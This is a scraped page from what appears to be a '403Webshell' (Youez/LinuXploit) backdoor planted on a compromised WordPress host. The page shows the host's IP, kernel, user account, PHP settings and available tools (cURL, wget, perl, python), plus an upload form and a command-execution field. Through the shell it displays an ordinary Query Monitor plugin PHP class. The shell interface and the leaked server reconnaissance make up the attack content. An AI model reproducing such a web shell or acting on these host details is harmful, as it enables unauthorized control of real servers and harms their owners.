403Webshell
Server IP : 145.239.37.162  /  Your IP : 216.73.217.46
Web Server : Apache
System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaa ( 38250)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaa/www/wp-content/plugins/query-monitor/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaa/www/wp-content/plugins/query-monitor/classes/Deprecated_File_Included.php
<?php declare(strict_types = 1);
/**
 * Class representing a deprecated file being included.
 *
 * @package query-monitor
 */

/**
 * @extends QM_Wrong<array{
 *   file: string,
 *   replacement: string,
 *   version: string,
 *   message: string,
 * }>
 */
final class QM_Deprecated_File_Included extends QM_Wrong {
	public function get_message(): string {
		[
			'file' => $file,
			'replacement' => $replacement,
			'version' => $version,
			'message' => $message,
		] = $this->args;

		if ( $replacement ) {
			return sprintf(
				/* translators: 1: PHP file name, 2: Version number, 3: Alternative file name, 4: Optional message regarding the change. */
				__( 'File %1$s is deprecated since version %2$s! Use %3$s instead. %4$s', 'query-monitor' ),
				$file,
				$version,
				$replacement,
				$message
			);
		}

		return sprintf(
			/* translators: 1: PHP file name, 2: Version number, 3: Optional message regarding the change. */
			__( 'File %1$s is deprecated since version %2$s with no alternative available. %3$s', 'query-monitor' ),
			$file,
			$version,
			$message
		);
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit